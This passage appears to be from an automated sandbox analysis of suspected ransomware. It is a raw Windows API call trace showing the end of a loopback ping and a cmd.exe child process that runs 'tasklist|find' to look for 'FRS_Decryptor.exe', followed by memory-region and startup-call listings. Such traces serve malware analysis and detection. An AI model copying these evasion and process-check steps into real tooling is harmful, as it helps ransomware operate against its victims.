lpBuffer="羠Č隆Ü⛿\x94䰨盪✼") returned 0x9 [0111.824] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0111.824] _fileno (_File=0x76ea4c28) returned 1 [0111.824] _get_osfhandle (_FileHandle=1) returned 0x28 [0111.824] GetFileType (hFile=0x28) returned 0x2 [0111.824] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefcc | out: lpMode=0xdcefcc) returned 0 [0111.824] GetLastError () returned 0x6 [0111.824] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef30, nSize=0x50 | out: lpBuffer="Ü✼") returned 0x0 [0111.824] _fileno (_File=0x76ea4c28) returned 1 [0111.824] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0111.824] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0111.824] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10b8988 [0111.824] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x10b8988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0111.824] _fileno (_File=0x76ea4c28) returned 1 [0111.825] _write (in: _FileHandle=1, _Buf=0x10b8988*, _MaxCharCount=0x9 | out: _Buf=0x10b8988*) returned 9 [0111.825] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0111.825] _fileno (_File=0x76ea4c28) returned 1 [0111.825] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0111.825] LocalFree (hMem=0x10b8988) returned 0x0 [0111.825] LocalFree (hMem=0x10c7fa0) returned 0x0 [0111.825] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xdcf00c, nSize=0x0, Arguments=0xdcf008 | out: lpBuffer="羠Č隆Ü➷\x94䰨盪✧") returned 0x9 [0111.825] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0111.825] _fileno (_File=0x76ea4c28) returned 1 [0111.825] _get_osfhandle (_FileHandle=1) returned 0x28 [0111.825] GetFileType (hFile=0x28) returned 0x2 [0111.825] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefd0 | out: lpMode=0xdcefd0) returned 0 [0111.825] GetLastError () returned 0x6 [0111.825] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef34, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0111.825] _fileno (_File=0x76ea4c28) returned 1 [0111.825] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0111.825] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0111.825] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10b8928 [0111.825] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x10b8928, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0111.825] _fileno (_File=0x76ea4c28) returned 1 [0111.825] _write (in: _FileHandle=1, _Buf=0x10b8928*, _MaxCharCount=0x9 | out: _Buf=0x10b8928*) returned 9 [0111.825] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0111.825] _fileno (_File=0x76ea4c28) returned 1 [0111.825] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0111.825] LocalFree (hMem=0x10b8928) returned 0x0 [0111.825] LocalFree (hMem=0x10c7fa0) returned 0x0 [0111.825] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xdcf008, nSize=0x0, Arguments=0xdcf004 | out: lpBuffer="羠Č隆Ü⟘\x94䰨盪✨") returned 0x9 [0111.825] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0111.825] _fileno (_File=0x76ea4c28) returned 1 [0111.825] _get_osfhandle (_FileHandle=1) returned 0x28 [0111.825] GetFileType (hFile=0x28) returned 0x2 [0111.825] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefcc | out: lpMode=0xdcefcc) returned 0 [0111.825] GetLastError () returned 0x6 [0111.825] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef30, nSize=0x50 | out: lpBuffer="Ü✨") returned 0x0 [0111.825] _fileno (_File=0x76ea4c28) returned 1 [0111.825] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0111.825] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0111.825] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10b8928 [0111.825] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x10b8928, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0111.825] _fileno (_File=0x76ea4c28) returned 1 [0111.825] _write (in: _FileHandle=1, _Buf=0x10b8928*, _MaxCharCount=0x9 | out: _Buf=0x10b8928*) returned 9 [0111.825] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0111.825] _fileno (_File=0x76ea4c28) returned 1 [0111.825] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0111.825] LocalFree (hMem=0x10b8928) returned 0x0 [0111.825] LocalFree (hMem=0x10c7fa0) returned 0x0 [0111.825] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xdcef90, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0111.825] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xdcef64, nSize=0x0, Arguments=0xdcef60 | out: lpBuffer="羠ČÜ᧰\x94䰨盪❏") returned 0x5c [0111.826] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0111.826] _fileno (_File=0x76ea4c28) returned 1 [0111.826] _get_osfhandle (_FileHandle=1) returned 0x28 [0111.826] GetFileType (hFile=0x28) returned 0x2 [0111.826] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcef28 | out: lpMode=0xdcef28) returned 0 [0111.826] GetLastError () returned 0x6 [0111.826] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcee8c, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0111.826] _fileno (_File=0x76ea4c28) returned 1 [0111.826] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0111.826] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0111.826] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x10c8068 [0111.826] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x10c8068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0111.826] _fileno (_File=0x76ea4c28) returned 1 [0111.826] _write (in: _FileHandle=1, _Buf=0x10c8068*, _MaxCharCount=0x5c | out: _Buf=0x10c8068*) returned 92 [0111.826] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0111.826] _fileno (_File=0x76ea4c28) returned 1 [0111.826] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0111.826] LocalFree (hMem=0x10c8068) returned 0x0 [0111.826] LocalFree (hMem=0x10c7fa0) returned 0x0 [0111.826] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xdcef70, nSize=0x0, Arguments=0xdcef6c | out: lpBuffer="羠ČÜᨧ\x94䰨盪❓") returned 0x61 [0111.826] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0111.826] _fileno (_File=0x76ea4c28) returned 1 [0111.826] _get_osfhandle (_FileHandle=1) returned 0x28 [0111.826] GetFileType (hFile=0x28) returned 0x2 [0111.826] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcef34 | out: lpMode=0xdcef34) returned 0 [0111.826] GetLastError () returned 0x6 [0111.826] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcee98, nSize=0x50 | out: lpBuffer="Ü❓") returned 0x0 [0111.826] _fileno (_File=0x76ea4c28) returned 1 [0111.826] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0111.826] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0111.826] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x10c8070 [0111.826] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x10c8070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0111.826] _fileno (_File=0x76ea4c28) returned 1 [0111.826] _write (in: _FileHandle=1, _Buf=0x10c8070*, _MaxCharCount=0x61 | out: _Buf=0x10c8070*) returned 97 [0111.826] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0111.826] _fileno (_File=0x76ea4c28) returned 1 [0111.826] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0111.826] LocalFree (hMem=0x10c8070) returned 0x0 [0111.826] LocalFree (hMem=0x10c7fa0) returned 0x0 [0111.826] IcmpCloseHandle (IcmpHandle=0x10b6c98) returned 1 [0111.827] LocalFree (hMem=0x10bc3e0) returned 0x0 [0111.827] LocalFree (hMem=0x10c5270) returned 0x0 [0111.827] WSACleanup () returned 0 [0111.827] exit (_Code=0) Thread: id = 305 os_tid = 0x8a4 Thread: id = 306 os_tid = 0x95c Process: id = "110" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6d5dd000" os_pid = "0x9b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5686 start_va = 0x550000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 5687 start_va = 0x570000 end_va = 0x571fff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5688 start_va = 0x580000 end_va = 0x58efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 5689 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 5690 start_va = 0x5d0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 5691 start_va = 0x6d0000 end_va = 0x6d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 5692 start_va = 0x6e0000 end_va = 0x6e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 5693 start_va = 0x6f0000 end_va = 0x6f1fff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 5694 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5695 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5696 start_va = 0x7ea80000 end_va = 0x7eaa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea80000" filename = "" Region: id = 5697 start_va = 0x7eaa5000 end_va = 0x7eaa5fff entry_point = 0x0 region_type = private name = "private_0x000000007eaa5000" filename = "" Region: id = 5698 start_va = 0x7eaab000 end_va = 0x7eaabfff entry_point = 0x0 region_type = private name = "private_0x000000007eaab000" filename = "" Region: id = 5699 start_va = 0x7eaad000 end_va = 0x7eaaffff entry_point = 0x0 region_type = private name = "private_0x000000007eaad000" filename = "" Region: id = 5700 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5701 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5702 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5703 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5704 start_va = 0x7d0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 5705 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5706 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5707 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5708 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 5709 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 5710 start_va = 0x700000 end_va = 0x77dfff entry_point = 0x700000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5711 start_va = 0x820000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 5712 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5713 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5714 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5715 start_va = 0x7e980000 end_va = 0x7ea7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e980000" filename = "" Region: id = 5716 start_va = 0x570000 end_va = 0x573fff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5717 start_va = 0x920000 end_va = 0xbf4fff entry_point = 0x920000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5736 start_va = 0x780000 end_va = 0x783fff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Thread: id = 307 os_tid = 0x71c [0111.854] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0111.854] __set_app_type (_Type=0x1) [0111.854] __p__fmode () returned 0x76ea1768 [0111.854] __p__commode () returned 0x76ea176c [0111.854] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0111.855] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0111.855] GetCurrentThreadId () returned 0x71c [0111.855] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x71c) returned 0x34 [0111.855] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0111.855] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0111.855] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.856] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.857] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x6cfebc | out: phkResult=0x6cfebc*=0x0) returned 0x2 [0111.857] VirtualQuery (in: lpAddress=0x6cfecb, lpBuffer=0x6cfe64, dwLength=0x1c | out: lpBuffer=0x6cfe64*(BaseAddress=0x6cf000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0111.857] VirtualQuery (in: lpAddress=0x5d0000, lpBuffer=0x6cfe64, dwLength=0x1c | out: lpBuffer=0x6cfe64*(BaseAddress=0x5d0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0111.857] VirtualQuery (in: lpAddress=0x5d1000, lpBuffer=0x6cfe64, dwLength=0x1c | out: lpBuffer=0x6cfe64*(BaseAddress=0x5d1000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0111.857] VirtualQuery (in: lpAddress=0x5d3000, lpBuffer=0x6cfe64, dwLength=0x1c | out: lpBuffer=0x6cfe64*(BaseAddress=0x5d3000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0111.857] VirtualQuery (in: lpAddress=0x6d0000, lpBuffer=0x6cfe64, dwLength=0x1c | out: lpBuffer=0x6cfe64*(BaseAddress=0x6d0000, AllocationBase=0x6d0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0111.857] GetConsoleOutputCP () returned 0x1b5 [0111.857] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0111.857] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x24c [0111.857] SetConsoleMode (hConsoleHandle=0x24c, dwMode=0x0) returned 0 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x24c [0111.857] GetConsoleMode (in: hConsoleHandle=0x24c, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0111.857] _get_osfhandle (_FileHandle=0) returned 0x24 [0111.857] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0111.857] GetEnvironmentStringsW () returned 0x8240c0* [0111.857] FreeEnvironmentStringsA (penv="=") returned 1 [0111.858] GetEnvironmentStringsW () returned 0x8240c0* [0111.858] FreeEnvironmentStringsA (penv="=") returned 1 [0111.858] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x6cee0c | out: phkResult=0x6cee0c*=0x44) returned 0x0 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x0, lpData=0x6cee18*=0xb2, lpcbData=0x6cee10*=0x1000) returned 0x2 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x4, lpData=0x6cee18*=0x1, lpcbData=0x6cee10*=0x4) returned 0x0 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x0, lpData=0x6cee18*=0x1, lpcbData=0x6cee10*=0x1000) returned 0x2 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x4, lpData=0x6cee18*=0x0, lpcbData=0x6cee10*=0x4) returned 0x0 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x4, lpData=0x6cee18*=0x40, lpcbData=0x6cee10*=0x4) returned 0x0 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x4, lpData=0x6cee18*=0x40, lpcbData=0x6cee10*=0x4) returned 0x0 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x0, lpData=0x6cee18*=0x40, lpcbData=0x6cee10*=0x1000) returned 0x2 [0111.858] RegCloseKey (hKey=0x44) returned 0x0 [0111.858] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x6cee0c | out: phkResult=0x6cee0c*=0x44) returned 0x0 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x0, lpData=0x6cee18*=0x40, lpcbData=0x6cee10*=0x1000) returned 0x2 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x4, lpData=0x6cee18*=0x1, lpcbData=0x6cee10*=0x4) returned 0x0 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x0, lpData=0x6cee18*=0x1, lpcbData=0x6cee10*=0x1000) returned 0x2 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x4, lpData=0x6cee18*=0x0, lpcbData=0x6cee10*=0x4) returned 0x0 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x4, lpData=0x6cee18*=0x9, lpcbData=0x6cee10*=0x4) returned 0x0 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x4, lpData=0x6cee18*=0x9, lpcbData=0x6cee10*=0x4) returned 0x0 [0111.858] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x6cee14, lpData=0x6cee18, lpcbData=0x6cee10*=0x1000 | out: lpType=0x6cee14*=0x0, lpData=0x6cee18*=0x9, lpcbData=0x6cee10*=0x1000) returned 0x2 [0111.858] RegCloseKey (hKey=0x44) returned 0x0 [0111.858] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5009b [0111.858] srand (_Seed=0x5aa5009b) [0111.858] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0111.858] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0111.858] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0111.858] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8240c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0111.859] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0111.859] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.859] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0111.859] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.859] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.859] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0111.859] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0111.859] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0111.859] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0111.859] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0111.859] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0111.859] _wcsicmp (_String1="KEYS", 